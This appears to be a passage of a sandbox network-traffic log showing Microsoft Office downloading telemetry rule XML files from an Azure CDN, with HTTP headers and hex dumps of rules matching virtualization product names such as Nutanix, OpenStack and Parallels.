                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:24 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    54192.168.2.64976013.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:24 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:25 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 901a75be-701e-0053-76cb-453a0a000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010025Z-1746fd949bdjrnwqhC1EWRpg2800000000ng00000000329k
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    55192.168.2.64976113.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:25 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:26 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8909076a-001e-00a2-6343-40d4d5000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010026Z-174f784596886s2bhC1EWR743w00000016n000000000sekx
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:26 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    56192.168.2.64976213.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:25 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:26 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 2accf417-001e-0014-64cb-455151000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010026Z-1746fd949bd54zxghC1EWRzre400000000u0000000005f2t
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:26 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    57192.168.2.64976313.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:26 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:26 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:26 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 485
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: e579458c-401e-0064-1dbd-4254af000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010026Z-174f7845968px8v7hC1EWR08ng00000016zg00000000a99g
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:26 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    58192.168.2.64976413.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:26 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:26 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 411
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4d2a6959-e01e-0085-41b2-42c311000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010026Z-174f7845968j6t2phC1EWRcfe800000016tg00000000kg9c
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:27 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    59192.168.2.64976513.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:27 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:27 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 470
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8c60988c-801e-00a3-08c1-457cfb000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010027Z-1746fd949bd77mkmhC1EWR5efc00000000q000000000h7dd
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:27 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    60192.168.2.64976613.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:27 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:28 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: 1a0f4f93-001e-0049-61cb-455bd5000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010028Z-1746fd949bdlqd7fhC1EWR6vt000000000n000000000gh8b
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:28 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    61192.168.2.64976713.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:28 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:28 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 502
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                                                    x-ms-request-id: b51b559c-801e-008c-7fcc-457130000000
                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241204T010028Z-1746fd949bdw2rg8hC1EWR11u400000000s000000000bu23
                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:28 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                    62192.168.2.64976813.107.246.63443
                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:28 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                    2024-12-04 01:00:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                    Date: Wed, 04 Dec 2024 01:00:28 GMT
                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
